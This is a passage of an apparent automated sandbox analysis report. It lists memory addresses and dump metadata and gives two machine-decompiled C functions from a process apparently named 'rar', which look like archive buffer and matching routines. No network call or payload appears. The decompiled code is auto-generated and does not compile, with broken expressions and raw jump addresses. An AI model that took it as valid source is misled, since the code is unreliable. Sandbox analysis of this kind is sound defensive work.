                                                                                                            0x7ff650b3f983
                                                                                                            0x7ff650b3f98d
                                                                                                            0x7ff650b3f98f
                                                                                                            0x7ff650b3f993
                                                                                                            0x7ff650b3f996
                                                                                                            0x7ff650b3f99a
                                                                                                            0x7ff650b3f99c
                                                                                                            0x7ff650b3f99f
                                                                                                            0x7ff650b3f9a1
                                                                                                            0x7ff650b3f9a4
                                                                                                            0x7ff650b3f9a6
                                                                                                            0x7ff650b3f9a9
                                                                                                            0x7ff650b3f9ab
                                                                                                            0x7ff650b3f9ae
                                                                                                            0x7ff650b3f9b0
                                                                                                            0x7ff650b3f9b3
                                                                                                            0x7ff650b3f9b8
                                                                                                            0x7ff650b3f9bb
                                                                                                            0x7ff650b3f9c0
                                                                                                            0x7ff650b3f9c4
                                                                                                            0x7ff650b3f9c9
                                                                                                            0x7ff650b3f9cc
                                                                                                            0x7ff650b3f9cf
                                                                                                            0x7ff650b3f9d1
                                                                                                            0x7ff650b3f9d7
                                                                                                            0x7ff650b3f9db
                                                                                                            0x7ff650b3f9df
                                                                                                            0x7ff650b3f9e5
                                                                                                            0x7ff650b3f9e9
                                                                                                            0x7ff650b3f9ed
                                                                                                            0x7ff650b3f9f0
                                                                                                            0x7ff650b3f9f6
                                                                                                            0x7ff650b3f9fa
                                                                                                            0x7ff650b3f9fe
                                                                                                            0x7ff650b3fa04
                                                                                                            0x7ff650b3fa0d
                                                                                                            0x7ff650b3fa0f
                                                                                                            0x7ff650b3fa1b
                                                                                                            0x7ff650b3fa1f
                                                                                                            0x7ff650b3fa22
                                                                                                            0x7ff650b3fa45
                                                                                                            0x7ff650b3fa49
                                                                                                            0x7ff650b3fa4d
                                                                                                            0x7ff650b3fa64
                                                                                                            0x7ff650b3fa71
                                                                                                            0x7ff650b3fa7d
                                                                                                            0x7ff650b3faa8

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f8f199c2666be7289f6152ebbef051ad92e8e0cca722cd4d3cbd1fbceafb78e4
                                                                                                            • Instruction ID: f5f265da9d482d8b5f49c8f845b154cfe54d45bf119d3640f35f81a58d255642
                                                                                                            • Opcode Fuzzy Hash: f8f199c2666be7289f6152ebbef051ad92e8e0cca722cd4d3cbd1fbceafb78e4
                                                                                                            • Instruction Fuzzy Hash: D891AC33B286529FE714CFB8D4856EC37B6A349358F548239DE0EA7B48DA39E506C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2089C Relevance: .2, Instructions: 232COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B2089C(long long __rbx, long long __rcx, long long __rsi, signed int __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v1080;
				long long _v1088;
				signed int _v1096;
				char _v1112;
				void* __rdi;
				intOrPtr _t92;
				intOrPtr _t93;
				void* _t106;
				void* _t115;
				signed int _t119;
				void* _t129;
				void* _t157;
				signed int _t159;
				signed int _t187;
				signed long long _t190;
				signed long long _t191;
				signed long long _t192;
				signed long long _t193;
				signed long long _t194;
				long long* _t197;
				void* _t202;
				signed long long _t214;
				intOrPtr _t218;
				long long _t232;
				intOrPtr _t234;
				void* _t238;
				void* _t243;
				void* _t244;
				void* _t245;
				intOrPtr* _t247;
				long long _t248;
				signed long long _t249;
				intOrPtr* _t253;
				intOrPtr* _t255;
				intOrPtr _t256;

				_t236 = __rbp;
				_t233 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t190 =  *0x50b978f0; // 0x27db226282f1
				_t191 = _t190 ^ _t238 - 0x00000450;
				_v56 = _t191;
				_t92 =  *((intOrPtr*)(__rcx + 0x1c));
				_t247 = __rcx + 0x48;
				_t232 = __rcx;
				if (_t92 == 0) goto 0x50b2092c;
				r14d = 0x4000;
				_t93 = _t92;
				_t140 =  <  ? _t93 : r14d;
				_t197 = _t191 * 0x8d8 +  *_t247;
				 *_t197 = __rcx;
				_t192 =  *((intOrPtr*)(__rcx + 0x10));
				 *((intOrPtr*)(_t197 + 0x10)) =  <  ? _t93 : r14d;
				 *((long long*)(_t197 + 8)) = _t192 + __rbp * 8;
				_t202 = _t197 + 0x18;
				E00007FF67FF650B47090(0, _t202);
				 *(_t197 + 0x8b0) =  *(_t197 + 0x8b0) & 0x00000000;
				if (0 + r14d -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x50b208e5;
				r14d =  *(__rcx + 0x54);
				_v1096 = r14d;
				_t26 = _t202 + 1; // 0x4002
				_t157 =  ==  ? 1 / r14d : _t26;
				r12d = 0;
				if (1 == 0) goto 0x50b209d5;
				_t193 = _t192 << 4;
				r12d = r12d + 1;
				_t253 =  &_v1080 + _t193;
				 *_t253 = _t193 * 0x8d8 +  *_t247;
				_t105 =  <  ? _t157 : 1;
				 *((intOrPtr*)(_t253 + 8)) =  <  ? _t157 : 1;
				if (1 == 1) goto 0x50b209a5;
				if (r14d - 2 < 0) goto 0x50b209a5;
				_t106 = E00007FF67FF650B5B224(_t193, _t197,  *((intOrPtr*)(__rcx + 8)), E00007FF67FF650B20ED0, __rsi, _t253);
				goto 0x50b209cf;
				r14d = 0;
				if (_t106 == 0) goto 0x50b209ca;
				E00007FF67FF650B20CB8(_t197, _t232, _t193 * 0x8d8 +  *_t253, _t232, _t253);
				r14d = r14d + 1;
				if (r14d -  *((intOrPtr*)(_t253 + 8)) < 0) goto 0x50b209ac;
				r14d = _v1096;
				if (0 + _t157 - 1 < 0) goto 0x50b20956;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t232 + 8)));
				r12d = 0;
				if (1 == 0) goto 0x50b20a66;
				_t194 = _t193 << 4;
				r12d = r12d + 1;
				_t255 =  &_v1080 + _t194;
				 *_t255 = _t194 * 0x8d8 +  *_t247;
				_t114 =  <  ? _t157 : 1;
				 *((intOrPtr*)(_t255 + 8)) =  <  ? _t157 : 1;
				if (1 == 1) goto 0x50b20a36;
				if (r14d - 2 < 0) goto 0x50b20a36;
				_t115 = E00007FF67FF650B5B224(_t194, _t197,  *((intOrPtr*)(_t232 + 8)), E00007FF67FF650B21510, _t233, _t255);
				goto 0x50b20a60;
				r14d = 0;
				if (_t115 == 0) goto 0x50b20a5b;
				_t229 = _t194 * 0x8d8 +  *_t255;
				E00007FF67FF650B21008(_t194, _t232, _t194 * 0x8d8 +  *_t255);
				r14d = r14d + 1;
				if (r14d -  *((intOrPtr*)(_t255 + 8)) < 0) goto 0x50b20a3d;
				r14d = _v1096;
				if (0 + _t157 - 1 < 0) goto 0x50b209e7;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t232 + 8)));
				if (1 == 0) goto 0x50b20b8e;
				r14d = 1;
				_v1088 = _t248;
				_t234 =  *_t247;
				_t40 = _t234 + 0x18; // 0x18
				_t214 = _t40 + _t197;
				_t119 = E00007FF67FF650B47004(_t194, _t197, _t214, _t229, _t234);
				_v1096 = _t119;
				r12d = 0;
				if ( *((intOrPtr*)(_t197 + _t234 + 0x8b0)) - __rbp <= 0) goto 0x50b20b40;
				_t256 =  *((intOrPtr*)(_t197 + _t234 + 0x8a8));
				_t249 = _t214 + _t214 * 2;
				if ( *(_t256 + 4 + _t249 * 4) <= 0) goto 0x50b20afd;
				r8d =  *(_t256 + 8 + _t249 * 4);
				_v1112 = _t119 & 0xffffff00 |  *((char*)(_t256 + _t249 * 4)) == 0x00000005;
				r9b = 0 == 0;
				E00007FF67FF650B21550( *(_t256 + 4 + _t249 * 4), _t197, _t232, _t234, __rbp);
				r8d =  *(_t256 + 4 + _t249 * 4);
				r8d = r8d;
				E00007FF67FF650B470C0(_t194, _t197, _t232 + 0x20, _t229 +  *((intOrPtr*)(_t197 + _t234 + 0x30)), _t234, _t236);
				_t159 =  *(_t256 + 4 + _t249 * 4);
				E00007FF67FF650B20BFC(_t197, _t232);
				_t218 =  *((intOrPtr*)(_t232 + 0x58));
				if (_t218 == 0) goto 0x50b20b23;
				if ( *((char*)(_t256 + _t249 * 4)) != 4) goto 0x50b20b1e;
				E00007FF67FF650B360E8(0, _t197, _t218, _t229 +  *((intOrPtr*)(_t197 + _t234 + 0x30)), _t232, _t234);
				goto 0x50b20b23;
				E00007FF67FF650B35AD0(0, _t197, _t218, _t232, _t234, _t236, _t255, _t243, _t244, _t245);
				r12d = r12d + 1;
				if (_t218 -  *((intOrPtr*)(_t197 + _t234 + 0x8b0)) < 0) goto 0x50b20aaa;
				if (_t159 -  *(_t197 + _t234 + 0x38) >= 0) goto 0x50b20b78;
				_t187 = _t159;
				_v1112 = 0;
				r8d = _v1096;
				r9b = _t187 == 0;
				E00007FF67FF650B21550( *(_t197 + _t234 + 0x38) - _t159, _t197, _t232, _t234, _t236);
				r8d =  *(_t197 + _t234 + 0x38);
				r8d = r8d - _t159;
				E00007FF67FF650B470C0(_t194, _t197, _t232 + 0x20, _t229 +  *((intOrPtr*)(_t197 + _t234 + 0x30)) +  *((intOrPtr*)(_t197 + _t234 + 0x30)), _t234, _t236);
				_v1088 = _v1088 - 1;
				if (_t187 != 0) goto 0x50b20a81;
				if ( *((intOrPtr*)(_t232 + 0x58)) == 0) goto 0x50b20b9c;
				_t129 = E00007FF67FF650B36084(_t197 + 0x8d8,  *((intOrPtr*)(_t232 + 0x58)));
				 *(_t232 + 0x1c) =  *(_t232 + 0x1c) & 0x00000000;
				return E00007FF67FF650B69D10(_t129, r12d, _v56 ^ _t238 - 0x00000450);
			}








































                                                                                                            0x7ff650b2089c
                                                                                                            0x7ff650b2089c
                                                                                                            0x7ff650b2089c
                                                                                                            0x7ff650b208a1
                                                                                                            0x7ff650b208a6
                                                                                                            0x7ff650b208bb
                                                                                                            0x7ff650b208c2
                                                                                                            0x7ff650b208c5
                                                                                                            0x7ff650b208cd
                                                                                                            0x7ff650b208d0
                                                                                                            0x7ff650b208d8
                                                                                                            0x7ff650b208dd
                                                                                                            0x7ff650b208df
                                                                                                            0x7ff650b208e5
                                                                                                            0x7ff650b208ed
                                                                                                            0x7ff650b208f9
                                                                                                            0x7ff650b208fd
                                                                                                            0x7ff650b20900
                                                                                                            0x7ff650b20904
                                                                                                            0x7ff650b2090b
                                                                                                            0x7ff650b2090f
                                                                                                            0x7ff650b20913
                                                                                                            0x7ff650b20918
                                                                                                            0x7ff650b2092a
                                                                                                            0x7ff650b2092c
                                                                                                            0x7ff650b20934
                                                                                                            0x7ff650b20945
                                                                                                            0x7ff650b2094a
                                                                                                            0x7ff650b2094d
                                                                                                            0x7ff650b20954
                                                                                                            0x7ff650b2095e
                                                                                                            0x7ff650b20962
                                                                                                            0x7ff650b20965
                                                                                                            0x7ff650b2097b
                                                                                                            0x7ff650b2097e
                                                                                                            0x7ff650b20981
                                                                                                            0x7ff650b20988
                                                                                                            0x7ff650b2098e
                                                                                                            0x7ff650b2099e
                                                                                                            0x7ff650b209a3
                                                                                                            0x7ff650b209a5
                                                                                                            0x7ff650b209aa
                                                                                                            0x7ff650b209bc
                                                                                                            0x7ff650b209c1
                                                                                                            0x7ff650b209c8
                                                                                                            0x7ff650b209ca
                                                                                                            0x7ff650b209d3
                                                                                                            0x7ff650b209d9
                                                                                                            0x7ff650b209de
                                                                                                            0x7ff650b209e5
                                                                                                            0x7ff650b209ef
                                                                                                            0x7ff650b209f3
                                                                                                            0x7ff650b209f6
                                                                                                            0x7ff650b20a0c
                                                                                                            0x7ff650b20a0f
                                                                                                            0x7ff650b20a12
                                                                                                            0x7ff650b20a19
                                                                                                            0x7ff650b20a1f
                                                                                                            0x7ff650b20a2f
                                                                                                            0x7ff650b20a34
                                                                                                            0x7ff650b20a36
                                                                                                            0x7ff650b20a3b
                                                                                                            0x7ff650b20a4a
                                                                                                            0x7ff650b20a4d
                                                                                                            0x7ff650b20a52
                                                                                                            0x7ff650b20a59
                                                                                                            0x7ff650b20a5b
                                                                                                            0x7ff650b20a64
                                                                                                            0x7ff650b20a6a
                                                                                                            0x7ff650b20a71
                                                                                                            0x7ff650b20a77
                                                                                                            0x7ff650b20a7c
                                                                                                            0x7ff650b20a81
                                                                                                            0x7ff650b20a85
                                                                                                            0x7ff650b20a89
                                                                                                            0x7ff650b20a8c
                                                                                                            0x7ff650b20a93
                                                                                                            0x7ff650b20a97
                                                                                                            0x7ff650b20aa2
                                                                                                            0x7ff650b20aaa
                                                                                                            0x7ff650b20ab2
                                                                                                            0x7ff650b20abd
                                                                                                            0x7ff650b20ac7
                                                                                                            0x7ff650b20ad1
                                                                                                            0x7ff650b20ad5
                                                                                                            0x7ff650b20adb
                                                                                                            0x7ff650b20ae0
                                                                                                            0x7ff650b20aeb
                                                                                                            0x7ff650b20af3
                                                                                                            0x7ff650b20af8
                                                                                                            0x7ff650b20b00
                                                                                                            0x7ff650b20b05
                                                                                                            0x7ff650b20b0c
                                                                                                            0x7ff650b20b15
                                                                                                            0x7ff650b20b17
                                                                                                            0x7ff650b20b1c
                                                                                                            0x7ff650b20b1e
                                                                                                            0x7ff650b20b23
                                                                                                            0x7ff650b20b31
                                                                                                            0x7ff650b20b46
                                                                                                            0x7ff650b20b48
                                                                                                            0x7ff650b20b4a
                                                                                                            0x7ff650b20b4f
                                                                                                            0x7ff650b20b55
                                                                                                            0x7ff650b20b5b
                                                                                                            0x7ff650b20b60
                                                                                                            0x7ff650b20b6b
                                                                                                            0x7ff650b20b73
                                                                                                            0x7ff650b20b83
                                                                                                            0x7ff650b20b88
                                                                                                            0x7ff650b20b95
                                                                                                            0x7ff650b20b97
                                                                                                            0x7ff650b20b9c
                                                                                                            0x7ff650b20bd0

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a939830f5e90769ac734bb923bb97baff60e8f00a52b5eab851816baab095007
                                                                                                            • Instruction ID: 49005b660abeb95c118814c6991d2e473788e3e0a20311493aab6f371da60b2e
                                                                                                            • Opcode Fuzzy Hash: a939830f5e90769ac734bb923bb97baff60e8f00a52b5eab851816baab095007
                                                                                                            • Instruction Fuzzy Hash: E0910222B28747A7EB54DF29D89427D77A4FB82B44F088035DA4FA3746DE3AE541C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B40214 Relevance: .2, Instructions: 231COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E00007FF67FF650B40214(long long __rbx, long long __rcx, long long __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _t107;
				intOrPtr _t113;
				signed int _t115;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr _t138;
				intOrPtr _t139;
				signed long long _t175;
				long long _t178;
				signed long long _t191;
				void* _t196;
				intOrPtr _t197;
				void* _t199;
				signed int _t206;
				signed char* _t208;
				void* _t212;
				signed long long _t213;
				void* _t216;
				void* _t218;
				intOrPtr* _t219;
				signed long long _t220;
				void* _t222;
				intOrPtr _t224;
				void* _t227;
				void* _t230;
				void* _t234;
				intOrPtr _t235;

				_t222 = __r11;
				_t216 = __r9;
				_t215 = __r8;
				 *((long long*)(_t212 + 8)) = __rbx;
				_push(_t199);
				_push(_t196);
				_push(_t227);
				_push(_t230);
				_t213 = _t212 - 0x850;
				_t175 =  *0x50b978f0; // 0x27db226282f1
				 *(_t213 + 0x840) = _t175 ^ _t213;
				 *((long long*)(_t213 + 0x38)) = __rdx;
				_t4 = _t215 - 0x3c; // -60
				_t129 = _t4;
				r15b = r9b;
				 *(_t213 + 0x24) = _t129;
				 *((intOrPtr*)(_t213 + 0x20)) = r15b;
				r8d = 0;
				 *((intOrPtr*)(_t213 + 0x30)) = 0;
				if (_t129 <= 0) goto 0x50b4045b;
				_t218 = _t213 + 0x40 - 0xc;
				_t9 = _t196 + 3; // 0x3
				r13d = _t9;
				r9d = 0;
				r14d = r8d;
				if (r15b == 0) goto 0x50b40323;
				_t206 = _t129;
				_t10 = _t215 + 3; // 0x3
				r11d = _t10;
				if (_t227 - _t206 >= 0) goto 0x50b40323;
				_t11 = _t227 - 2; // 0x1
				_t234 = _t11 + __rdx;
				_t13 = _t215 + 0x780; // 0x780
				_t14 = _t222 - 0x1e; // -27
				_t113 = _t14;
				r12d = r9d;
				if (r11d - _t13 >= 0) goto 0x50b4031f;
				_t15 = _t234 + 3; // 0x4
				_t178 = _t15;
				 *((long long*)(_t213 + 0x28)) = _t178;
				asm("cdq");
				asm("cdq");
				_t235 =  *((intOrPtr*)(_t213 + 0x28));
				asm("cdq");
				_t130 = __rcx + _t178;
				if (_t130 - r9d <= 0) goto 0x50b40305;
				r14d = _t113;
				r14d =  >  ? r8d : r14d;
				r11d = r11d + 3;
				r9d = _t130;
				r9d =  <=  ? r12d : r9d;
				if (_t199 - __rdx + _t235 - _t206 < 0) goto 0x50b402ab;
				_t131 =  *(_t213 + 0x24);
				_t197 =  *((intOrPtr*)(_t213 + 0x38));
				_t115 = _t113 + 0x00000003 | 0xffffffff;
				r11d = 0;
				_t224 = r14d;
				 *((long long*)(_t213 + 0x28)) = __rcx;
				_t28 = _t222 + 0x30; // 0x30
				r15d = _t28;
				r9d = 0;
				if (_t235 + _t230 - _t131 >= 0) goto 0x50b403dc;
				_t31 = _t216 - 2; // -2
				_t208 = _t197 + 2 + _t224;
				if (r9d - _t115 >= 0) goto 0x50b403d5;
				asm("cdq");
				r12d = ( *(_t208 - 1) & 0x000000ff) - ( *(__rcx +  &(_t208[1])) & 0x000000ff);
				r12d = r12d ^ _t131;
				r12d = r12d - _t131;
				asm("cdq");
				r12d = r12d + (( *(_t208 - 2) & 0x000000ff) - ( *( *((intOrPtr*)(_t213 + 0x28)) + _t208) & 0x000000ff) ^ _t131) - _t131;
				asm("cdq");
				r12d = r12d + (( *_t208 & 0x000000ff) - ( *( *((intOrPtr*)(_t213 + 0x28)) +  &(_t208[2])) & 0x000000ff) ^ _t131) - _t131;
				if ( *((char*)(_t213 + 0x20)) != 0) goto 0x50b403b4;
				if (r12d - 0x32 > 0) goto 0x50b403cc;
				r9d = r9d + r12d;
				if (_t31 - _t224 - _t197 +  &(_t208[3]) - 0x3c >= 0) goto 0x50b403d5;
				goto 0x50b4035e;
				r9d = r9d | 0xffffffff;
				_t107 =  >=  ? r11d : r15d;
				r9d =  >=  ? _t115 : r9d;
				r15d = r15d + 3;
				 *((long long*)(_t213 + 0x28)) =  *((intOrPtr*)(_t213 + 0x28)) + 3;
				r11d = _t107;
				if (r15d - 0x2000 < 0) goto 0x50b4033e;
				_t138 =  *((intOrPtr*)(_t213 + 0x30));
				if (r9d == 0xffffffff) goto 0x50b4043d;
				if (_t138 - 0x100 >= 0) goto 0x50b4043d;
				_t139 = _t138 + 1;
				 *(_t218 + 0xc) = _t107;
				_t219 = _t218 + 4;
				 *((intOrPtr*)(_t213 + 0x30)) = _t139;
				if (_t139 - 2 <= 0) goto 0x50b4043d;
				if ( *((intOrPtr*)(_t219 + 4)) != _t107) goto 0x50b4043d;
				if ( *_t219 == _t107) goto 0x50b404fc;
				r15b =  *((intOrPtr*)(_t213 + 0x20));
				r8d = r8d + 0x780;
				if (r8d -  *(_t213 + 0x24) < 0) goto 0x50b40273;
				_t191 = _t213 + 0x440;
				r8d = 0x400;
				E00007FF67FF650B6C1A0(_t107, 0, _t191, __rdx, __r8);
				if (_t139 <= 0) goto 0x50b404e4;
				r9d = r9d | 0xffffffff;
				r8d = 0;
				_t55 = _t191 - 1; // -1
				_t220 = _t55;
				if (r9d < 0) goto 0x50b404bd;
				r11d =  *(_t213 + 0x40 + _t220 * 4);
				if (r11d - 0x64 <= 0) goto 0x50b404a8;
				asm("cdq");
				if ( *(_t213 + 0x40 + _t191 * 4) % r11d == 0) goto 0x50b404b0;
				goto 0x50b4048f;
				r8d =  *((intOrPtr*)(_t213 + 0x440 + (_t220 - 1) * 4));
				 *(_t213 + 0x40 + _t191 * 4) = r11d;
				r8d = r8d + 1;
				if (r8d <= 0) goto 0x50b404cc;
				 *((intOrPtr*)(_t213 + 0x440 + _t191 * 4)) = r8d;
				r9d = r9d + 1;
				if (_t191 + 1 - _t139 < 0) goto 0x50b40482;
				if (r8d - 3 >= 0) goto 0x50b404fa;
				if (r15b != 0) goto 0x50b404fa;
				r15b = 1;
				goto 0x50b40250;
				return E00007FF67FF650B69D10( *(_t213 + 0x40 + _t191 * 4), 0,  *(_t213 + 0x840) ^ _t213);
			}































                                                                                                            0x7ff650b40214
                                                                                                            0x7ff650b40214
                                                                                                            0x7ff650b40214
                                                                                                            0x7ff650b40214
                                                                                                            0x7ff650b4021a
                                                                                                            0x7ff650b4021b
                                                                                                            0x7ff650b4021e
                                                                                                            0x7ff650b40220
                                                                                                            0x7ff650b40224
                                                                                                            0x7ff650b4022b
                                                                                                            0x7ff650b40235
                                                                                                            0x7ff650b40240
                                                                                                            0x7ff650b40245
                                                                                                            0x7ff650b40245
                                                                                                            0x7ff650b40249
                                                                                                            0x7ff650b4024c
                                                                                                            0x7ff650b40252
                                                                                                            0x7ff650b40257
                                                                                                            0x7ff650b4025a
                                                                                                            0x7ff650b40260
                                                                                                            0x7ff650b4026b
                                                                                                            0x7ff650b4026f
                                                                                                            0x7ff650b4026f
                                                                                                            0x7ff650b40273
                                                                                                            0x7ff650b40276
                                                                                                            0x7ff650b4027c
                                                                                                            0x7ff650b40282
                                                                                                            0x7ff650b40285
                                                                                                            0x7ff650b40285
                                                                                                            0x7ff650b4028c
                                                                                                            0x7ff650b40292
                                                                                                            0x7ff650b40296
                                                                                                            0x7ff650b402a0
                                                                                                            0x7ff650b402a7
                                                                                                            0x7ff650b402a7
                                                                                                            0x7ff650b402ab
                                                                                                            0x7ff650b402b1
                                                                                                            0x7ff650b402b3
                                                                                                            0x7ff650b402b3
                                                                                                            0x7ff650b402b7
                                                                                                            0x7ff650b402c7
                                                                                                            0x7ff650b402d9
                                                                                                            0x7ff650b402e3
                                                                                                            0x7ff650b402ee
                                                                                                            0x7ff650b402f3
                                                                                                            0x7ff650b402f9
                                                                                                            0x7ff650b402fe
                                                                                                            0x7ff650b40301
                                                                                                            0x7ff650b40305
                                                                                                            0x7ff650b40310
                                                                                                            0x7ff650b40316
                                                                                                            0x7ff650b4031d
                                                                                                            0x7ff650b4031f
                                                                                                            0x7ff650b40323
                                                                                                            0x7ff650b40328
                                                                                                            0x7ff650b4032b
                                                                                                            0x7ff650b4032e
                                                                                                            0x7ff650b40335
                                                                                                            0x7ff650b4033a
                                                                                                            0x7ff650b4033a
                                                                                                            0x7ff650b4033e
                                                                                                            0x7ff650b40347
                                                                                                            0x7ff650b40351
                                                                                                            0x7ff650b40355
                                                                                                            0x7ff650b40361
                                                                                                            0x7ff650b4036e
                                                                                                            0x7ff650b4036f
                                                                                                            0x7ff650b40377
                                                                                                            0x7ff650b4037a
                                                                                                            0x7ff650b40387
                                                                                                            0x7ff650b4038c
                                                                                                            0x7ff650b4039f
                                                                                                            0x7ff650b403a4
                                                                                                            0x7ff650b403ac
                                                                                                            0x7ff650b403b2
                                                                                                            0x7ff650b403bd
                                                                                                            0x7ff650b403c8
                                                                                                            0x7ff650b403ca
                                                                                                            0x7ff650b403d1
                                                                                                            0x7ff650b403e2
                                                                                                            0x7ff650b403e6
                                                                                                            0x7ff650b403ee
                                                                                                            0x7ff650b403f2
                                                                                                            0x7ff650b403f7
                                                                                                            0x7ff650b40404
                                                                                                            0x7ff650b4040a
                                                                                                            0x7ff650b40411
                                                                                                            0x7ff650b40419
                                                                                                            0x7ff650b4041b
                                                                                                            0x7ff650b4041d
                                                                                                            0x7ff650b40421
                                                                                                            0x7ff650b40425
                                                                                                            0x7ff650b4042c
                                                                                                            0x7ff650b40432
                                                                                                            0x7ff650b40437
                                                                                                            0x7ff650b4043d
                                                                                                            0x7ff650b4044c
                                                                                                            0x7ff650b40455
                                                                                                            0x7ff650b4045d
                                                                                                            0x7ff650b40467
                                                                                                            0x7ff650b40470
                                                                                                            0x7ff650b4047c
                                                                                                            0x7ff650b4047e
                                                                                                            0x7ff650b40482
                                                                                                            0x7ff650b40485
                                                                                                            0x7ff650b40485
                                                                                                            0x7ff650b4048f
                                                                                                            0x7ff650b40491
                                                                                                            0x7ff650b4049a
                                                                                                            0x7ff650b404a0
                                                                                                            0x7ff650b404a6
                                                                                                            0x7ff650b404ae
                                                                                                            0x7ff650b404b0
                                                                                                            0x7ff650b404b8
                                                                                                            0x7ff650b404bd
                                                                                                            0x7ff650b404c3
                                                                                                            0x7ff650b404cc
                                                                                                            0x7ff650b404d4
                                                                                                            0x7ff650b404dd
                                                                                                            0x7ff650b404e2
                                                                                                            0x7ff650b404e7
                                                                                                            0x7ff650b404ed
                                                                                                            0x7ff650b404f5
                                                                                                            0x7ff650b40526

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e7ef8efe9f62bb1c03405a6720a2ebfc8e36302898aaddfe372e3d5dd2e85563
                                                                                                            • Instruction ID: c4f6d153aca99653ade2b09502556c6871c45aa87d2ca3ce3931ec7bd0c06efb
